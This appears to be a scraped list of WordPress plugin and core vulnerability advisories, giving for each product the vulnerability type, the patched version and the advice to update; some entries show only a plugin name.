Recommended Action: Update to version 1.15.20, or a newer patched version

Plugin: Contact Form DB

Vulnerability: CSV Injection
Patched Version: 2.10.36
Recommended Action: Update to version 2.10.36, or a newer patched version

Plugin: WP Hotel Booking

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Power Zoomer

Plugin: Unite Gallery Lite

Vulnerability: Cross-Site Request Forgery and SQL Injection
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 3.7.10
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.10, 3.8.10, 3.9.8, 4.0.7, 4.1.7, 4.2.4

Plugin: MyBB Cross-Poster

Plugin: Clock In Portal- Staff & Attendance Management

Vulnerability: Cross-Site Request Forgery To Designation Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Accessibility Suite by Ability, Inc

Vulnerability: SQL Injection
Patched Version: 2.0.11
Recommended Action: Update to version 2.0.11, or a newer patched version

Plugin: Domain Check

Vulnerability: Reflected Cross-Site Scripting via domain
Patched Version: 1.0.17
Recommended Action: Update to version 1.0.17, or a newer patched version

Plugin: Count per Day

Vulnerability: Cross-Site Scripting
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: Simple File List

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.4.12
Recommended Action: Update to version 4.4.12, or a newer patched version

Plugin: BNE Testimonials

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Client Dash

Plugin: WP-Paginate

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Customer Reviews for WooCommerce

Vulnerability: Missing Authorization via manual review reminders
Patched Version: 5.38.2
Recommended Action: Update to version 5.38.2, or a newer patched version

Plugin: Per page add to head

Plugin: GMAce

Vulnerability: Cross-Site Request Forgery via gmace_manager_client
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Chained Quiz

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Analytify – Google Analytics Dashboard For WordPress (GA4 analytics made easy)

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: Download from files

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: Simple User Listing

Vulnerability: Reflected Cross-Site Scripting via as
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: Embed Images in Comments

Vulnerability: Cross-Site Scripting
Patched Version: 0.6
Recommended Action: Update to version 0.6, or a newer patched version

Plugin: asMember

Plugin: Wise Chat

Vulnerability: CSV Injection
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Authentication Bypass
Patched Version: 3.9.1
Recommended Action: Update to version 3.9.1, or a newer patched version

Plugin: WP Symposium Pro

Vulnerability: Cross-Site Request Forgery
Patched Version: 16.01
Recommended Action: Update to version 16.01, or a newer patched version

Plugin: Colibri Page Builder

Vulnerability: Authenticated (Administrator+) SQL Injection via post_id
Patched Version: 1.0.229
Recommended Action: Update to version 1.0.229, or a newer patched version

Plugin: WordPress Job Board and Recruitment Plugin – JobWP

Vulnerability: Sensitive Information Exposure
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Backup by 10Web – Backup and Restore Plugin

Plugin: Simple Login Log

Vulnerability: SQL Injection
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Templately – Elementor & Gutenberg Template Library: 5000+ Free & Pro Ready Templates & Cloud!

Vulnerability: Improper Authorization to Arbitrary Post Deletion
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Disqus Comment System

Vulnerability: Remote Code Execution
Patched Version: 2.76
Recommended Action: Update to version 2.76, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Nonce Leak to Authorization Bypass
Patched Version: 1.9.51
Recommended Action: Update to version 1.9.51, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Request Forgery to Arbitrary Media Deletion
Patched Version: 8.0.9
Recommended Action: Update to version 8.0.9, or a newer patched version

Plugin: Post Duplicator

Vulnerability: Cross-Site Scripting
Patched Version: 2.24
Recommended Action: Update to version 2.24, or a newer patched version

Plugin: Tabs – Responsive Tabs with WooCommerce Product Tab Extension

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: Contact Form Email

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.48
Recommended Action: Update to version 1.1.48, or a newer patched version

Plugin: Transposh WordPress Translation

Plugin: front-end-upload

Vulnerability: Arbitrary File Upload
Patched Version: 0.5.4
Recommended Action: Update to version 0.5.4, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Unauthenticated File Download w/ Information Disclosure
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: WPIDE – File Manager & Code Editor

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: EAN Barcode Generator for WooCommerce: UPC, ISBN & GTIN Inventory

Vulnerability: Authenticated (Contributor+ )Stored Cross-Site Scripting via Shortcode
Patched Version: 4.4.3
Recommended Action: Update to version 4.4.3, or a newer patched version

Plugin: acobot

Vulnerability: Cross-Site Request Forgery and Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Sola Support Tickets

Vulnerability: Cross-Site Scripting
Patched Version: 3.13
Recommended Action: Update to version 3.13, or a newer patched version

Plugin: CodeColorer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 0.10.1
Recommended Action: Update to version 0.10.1, or a newer patched version

Plugin: MailUp newsletter sign-up form

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Members List Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.7
Recommended Action: Update to version 4.3.7, or a newer patched version

Plugin: WP-UserOnline

Vulnerability: Cross-Site Scripting
Patched Version: 2.70
Recommended Action: Update to version 2.70, or a newer patched version

Plugin: OpenBook Book Data

Plugin: Query Wrangler

Vulnerability: Reflected Cross-Site Scripting via page parameter
Patched Version: 1.5.52
Recommended Action: Update to version 1.5.52, or a newer patched version

Plugin: Protected Posts Logout Button

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: WP GPX Maps

Vulnerability: Arbitrary File Upload
Patched Version: 1.1.23
Recommended Action: Update to version 1.1.23, or a newer patched version

Plugin: PeproDev CF7 Database

Vulnerability: Unauthenticated Stored Cross-Site Scripting via form submission
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: KiviCare – Clinic & Patient Management System (EHR)

Vulnerability: SQL Injection
Patched Version: 2.3.9
Recommended Action: Update to version 2.3.9, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Stored Cross-Site Scripting
Patched Version: 7.5.19.728
Recommended Action: Update to version 7.5.19.728, or a newer patched version

Plugin: Visitor Traffic Real Time Statistics

Vulnerability: Missing Authorization to Information Disclosure
Patched Version: 6.9
Recommended Action: Update to version 6.9, or a newer patched version

Plugin: Contact Form 7 Style

Plugin: iframe

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: WP Print Friendly

Vulnerability: Cross-Site Scripting
Patched Version: 0.6.1
Recommended Action: Update to version 0.6.1, or a newer patched version

Plugin: Contact Form by BestWebSoft – Advanced Contact Us Form Builder for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.0.6
Recommended Action: Update to version 4.0.6, or a newer patched version

Plugin: Author Avatars List/Block

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.18
Recommended Action: Update to version 2.1.18, or a newer patched version

Plugin: Plug your WooCommerce into the largest catalog of customized print products from Helloprint

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.10
Recommended Action: Update to one of the following versions, or a newer patched version: 2.0.10, 2.1.3

Plugin: ZeroBounce Email Verification & Validation

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.12
Recommended Action: Update to version 1.0.12, or a newer patched version

Plugin: CITS Support svg, webp Media and TTF,OTF File Upload

Vulnerability: Authenticated(Author+) Stored Cross-Site Scripting via SVG Upload
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: PhotoXhibit

Vulnerability: Reflected Cross-Site Scripting via gid
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Verification – Email Verification, Email OTP, Block Spam Email, Passwordless login

Vulnerability: Privilege Escalation
Patched Version: 1.0.94
Recommended Action: Update to version 1.0.94, or a newer patched version

Plugin: Catch Themes Demo Import

Vulnerability: Authenticated (Admin+) Arbitrary File Upload
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: uTubeVideo Gallery

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Cross-Site Request Forgery leading to Settings Change
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: FGallery Plus

Plugin: Content Audit

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.9.2
Recommended Action: Update to version 1.9.2, or a newer patched version

Plugin: Custom Registration Forms Builder for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Product Feed PRO for WooCommerce by AdTribes – WooCommerce Product Feeds

Vulnerability: Cross-Site Request Forgery
Patched Version: 12.4.5
Recommended Action: Update to version 12.4.5, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Cross-Site Scripting
Patched Version: 4.3.3
Recommended Action: Update to version 4.3.3, or a newer patched version

Plugin: WP Sticky Button – Click to Chat

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Post Pay Counter

Vulnerability: PHP Object Injection
Patched Version: 2.731
Recommended Action: Update to version 2.731, or a newer patched version

Plugin: Themify Post Type Builder (PTB) Search Addon

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery via give_cache_flush
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: Affiliate For WooCommerce

Vulnerability: Missing Authorization
Patched Version: 4.8.0
Recommended Action: Update to version 4.8.0, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.3.11
Recommended Action: Update to version 7.3.11, or a newer patched version

Core: WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Anti-Spam: Spam Protection | Block Spam Users, Comments, Forms

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2023
Recommended Action: Update to version 2023, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: Insights from Google PageSpeed

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Core: WordPress

Vulnerability: Directory Traversal
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Affiliates Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.9.14
Recommended Action: Update to version 2.9.14, or a newer patched version

Plugin: WxSync-标准云微信公众号文章免费采集-任意公众号自动采集付费购买

Plugin: Quizlord

Plugin: Extensive VC Addons for WPBakery page builder

Vulnerability: Unauthenticated Local File Inclusion
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: Weaver Show Posts

Vulnerability: Authenticated(Contributor+) Stored Cross-Site Scripting via Display Name
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: User Profile & User Registration Forms <= 3.6.1
Patched Version: 3.6.2
Recommended Action: Update to version 3.6.2, or a newer patched version

Plugin: CM Download Manager – Document and File Management

Vulnerability: Directory Traversal to Arbitrary File Deletion and Denial of Service
Patched Version: 2.8.0
Recommended Action: Update to version 2.8.0, or a newer patched version

Plugin: Ninja Tables – Easy Data Table Builder

Vulnerability: Missing Authorization
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: salesking

Vulnerability: Missing Authorization to Settings Change
Patched Version: 1.6.30
Recommended Action: Update to version 1.6.30, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Missing Authorization to Arbitrary Attachment Read
Patched Version: 3.16.5
Recommended Action: Update to version 3.16.5, or a newer patched version

Plugin: Login as User or Customer

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Installation/Activation
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 8.14.1
Recommended Action: Update to version 8.14.1, or a newer patched version

Plugin: WP Prayer

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: AffiliateWP

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.9.1
Recommended Action: Update to version 2.0.9.1, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: amerisale-re

Plugin: Juicer.io: Effortlessly embed, curate, and aggregate social media feeds into your website

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.11
Recommended Action: Update to version 1.11, or a newer patched version

Plugin: WooCommerce Warranty Requests

Vulnerability: Missing Authorization
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Logo Slider – Logo Showcase, Logo Carousel, Logo Gallery and Client Logo Presentation

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Advanced Order Export For WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Gravity Forms

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Email Users

Plugin: Chained Quiz

Vulnerability: Reflected Cross-Site Scripting via dnf
Patched Version: 1.3.2.1
Recommended Action: Update to version 1.3.2.1, or a newer patched version

Plugin: ConvertBox Auto Embed WordPress plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.20
Recommended Action: Update to version 1.0.20, or a newer patched version

Plugin: CommentLuv

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.92.4
Recommended Action: Update to version 2.92.4, or a newer patched version

Plugin: Drag and Drop Multiple File Upload – Contact Form 7

Vulnerability: Cross-Site Request Forgery in dnd_upload_cf7_upload and dnd_codedropz_upload_delete
Patched Version: 1.3.6.6
Recommended Action: Update to version 1.3.6.6, or a newer patched version

Plugin: Ecwid by Lightspeed Ecommerce Shopping Cart

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 6.11.5
Recommended Action: Update to version 6.11.5, or a newer patched version

Plugin: Login No Captcha reCAPTCHA

Vulnerability: CAPTCHA Bypass via Whitelisted IP Address Spoofing
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: Page Link Manager

Plugin: Shortcode for Font Awesome

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: GoDaddy Email Marketing

Plugin: BuddyPress Activity Plus

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: GD Rating System

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘wpfc_purgecache_varnish_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Quick Chat

Vulnerability: SQL Injection
Patched Version: 4.00
Recommended Action: Update to version 4.00, or a newer patched version

Plugin: Quick Event Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 9.7.5
Recommended Action: Update to version 9.7.5, or a newer patched version

Plugin: typofr

Plugin: Craw Data

Vulnerability: Server Side Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP All Export Pro

Vulnerability: Authenticated Remote Code Execution
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: Gallery for Social Photo

Vulnerability: Subscriber+ SQL Injection
Patched Version: 1.0.0.27
Recommended Action: Update to version 1.0.0.27, or a newer patched version

Core: WordPress

Vulnerability: jQuery Prototype Pollution
Patched Version: 3.7.38
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.38, 3.8.38, 3.9.36, 4.0.35, 4.1.35, 4.2.32, 4.3.28, 4.4.27, 4.5.26, 4.6.23, 4.7.23, 4.8.19, 4.9.20, 5.0.16, 5.1.13, 5.2.15, 5.3.12, 5.4.10, 5.5.9, 5.6.8, 5.7.6, 5.8.4, 5.9.2

Plugin: WP SMS – Ultimate SMS & MMS Notifications, 2FA, OTP, and Integrations with WooCommerce, GravityForms, and More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.5.2
Recommended Action: Update to version 6.5.2, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Missing Authorization
Patched Version: 6.5.8
Recommended Action: Update to version 6.5.8, or a newer patched version

Plugin: verwei.se – WordPress – Twitter

Plugin: Clerk

Vulnerability: Authorization Bypass via Insufficient Validation
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: Video Grid

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.22
Recommended Action: Update to version 1.22, or a newer patched version

Plugin: Quotes and Tips by BestWebSoft

Vulnerability: Cross-Site Scripting
Patched Version: 1.20
Recommended Action: Update to version 1.20, or a newer patched version

Plugin: Popup with fancybox

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: Mantenimiento web

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.9
Recommended Action: Update to version 0.9, or a newer patched version

Plugin: Autoptimize

Vulnerability: Unsafe File Upload to Cross-Site Scripting
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Core: WordPress

Vulnerability: Server Side Request Forgery
Patched Version: 3.7.31
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.31, 3.8.31, 3.9.29, 4.0.28, 4.1.28, 4.2.25, 4.3.21, 4.4.20, 4.5.19, 4.6.16, 4.7.14, 4.8.11, 4.9.12, 5.0.7, 5.1.3, 5.2.4

Plugin: The Plus Addons for Elementor Page Builder

Vulnerability: Open Redirect
Patched Version: 4.1.11
Recommended Action: Update to version 4.1.11, or a newer patched version

Plugin: WORDPRESS VIDEO GALLERY

Vulnerability: SQL Injection
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: Printful Integration for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Dynamic Font Replacement DFR4WP EN

Plugin: Vanguard – Marketplace Digital Products PHP7

Vulnerability: Marketplace Digital Products PHP7 <= 2.1
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Career Openings

Plugin: Ultimate Carousel For WPBakery Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Crowdfunding

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: InPost Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.2.1
Recommended Action: Update to version 2.1.2.1, or a newer patched version

Plugin: Jeg Elementor Kit

Vulnerability: Unauthenticated Authorization Bypass
Patched Version: 2.5.7
Recommended Action: Update to version 2.5.7, or a newer patched version

Plugin: wordpress vertical image slider plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.17
Recommended Action: Update to version 1.2.17, or a newer patched version

Plugin: Simple Personal Message

Vulnerability: Authenticated SQL Injection
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Replyable – Subscribe to Comments and Reply by Email

Vulnerability: Cross-Site Scripting
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: Stored Cross-Site Scripting
Patched Version: 9.1.2
Recommended Action: Update to version 9.1.2, or a newer patched version

Plugin: WWM Social Share On Image Hover

Plugin: Page Builder: Pagelayer – Drag and Drop website builder

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting via Header/Footer
Patched Version: 1.7.8
Recommended Action: Update to version 1.7.8, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Authenticated (Administrator+) SQL Injection via ‘orderby’
Patched Version: 5.4.11
Recommended Action: Update to version 5.4.11, or a newer patched version

Plugin: Cyr to Lat enhanced

Vulnerability: Authenticated SQL Injection
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: Event Tickets and Registration

Vulnerability: Open Redirect
Patched Version: 5.2.2
Recommended Action: Update to version 5.2.2, or a newer patched version

Plugin: FunnelKit Checkout

Vulnerability: Unauthenticated Arbitrary Content Deletion
Patched Version: 3.11.0
Recommended Action: Update to version 3.11.0, or a newer patched version

Plugin: Fluid Responsive Slideshow

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: Affiliates Manager

Vulnerability: CSV Injection
Patched Version: 2.9.14
Recommended Action: Update to version 2.9.14, or a newer patched version

Plugin: SALERT – Fake Sales Notification WooCommerce

Vulnerability: Missing Authorization via salert_save_settings_with_ajax()
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: HUSKY – Products Filter Professional for WooCommerce

Vulnerability: Products Filter for WooCommerce <= 1.1.9
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Journey Analytics

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.13
Recommended Action: Update to version 1.0.13, or a newer patched version

Plugin: Error Log Viewer by BestWebSoft

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: 2Checkout Add-on for iThemes Exchange

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: PixTypes

Plugin: ShiftController Employee Shift Scheduling

Vulnerability: Cross-Site Request Forgery via get
Patched Version: 4.9.24
Recommended Action: Update to version 4.9.24, or a newer patched version

Plugin: JVM Gutenberg Rich Text Icons

Vulnerability: Authenticated(Subscriber+) Arbitrary File Upload
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: StagTools

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: AnyComment

Vulnerability: Race Condition
Patched Version: 0.2.18
Recommended Action: Update to version 0.2.18, or a newer patched version

Plugin: Fontsampler

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 0.4.13
Recommended Action: Update to version 0.4.13, or a newer patched version

Plugin: Display Post Metadata

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.6.6
Recommended Action: Update to version 4.1.6.6, or a newer patched version

Plugin: About Me

Plugin: CURCY – Multi Currency for WooCommerce – The best free currency exchange plugin – Run smoothly on WooCommerce 8.x

Vulnerability: Missing Authorization to Currency Exchange Retrieval
Patched Version: 2.1.26
Recommended Action: Update to version 2.1.26, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: CMS Commander – Manage Multiple Sites

Vulnerability: Authorization Bypass through Use of Insufficiently Unique Cryptographic Signature
Patched Version: 2.288
Recommended Action: Update to version 2.288, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Predictive Search

Vulnerability: Missing Authorization
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Template Name
Patched Version: 3.7.22
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.22, 3.8.22, 3.9.20, 4.0.19, 4.1.19, 4.2.16, 4.3.12, 4.4.11, 4.5.10, 4.6.7, 4.7.6, 4.8.2

Plugin: Superb Social Media Share Buttons and Follow Buttons for WordPress

Vulnerability: Missing Authorization via spbsmAjax
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: CoSchedule

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.9
Recommended Action: Update to version 3.3.9, or a newer patched version

Plugin: WP Register Profile With Shortcode

Vulnerability: Cross-Site Request Forgery to User Password Reset
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: Photo Gallery by Ays – Responsive Image Gallery

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.1.7
Recommended Action: Update to version 5.1.7, or a newer patched version

Plugin: Link Optimizer Lite

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Cross-Site Request Forgery via permalink_setup
Patched Version: 3.3.3
Recommended Action: Update to version 3.3.3, or a newer patched version

Plugin: Smarty for WordPress

Vulnerability: Cross-Site Request Forgery via displaySmartyManagementPage
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Broken Link Checker

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.10.2
Recommended Action: Update to version 1.10.2, or a newer patched version

Plugin: MailPoet Newsletters (Previous)

Vulnerability: SQL Injection
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: Cross-RSS

Plugin: Safe SVG

Vulnerability: Cross-Site Scripting Bypass
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

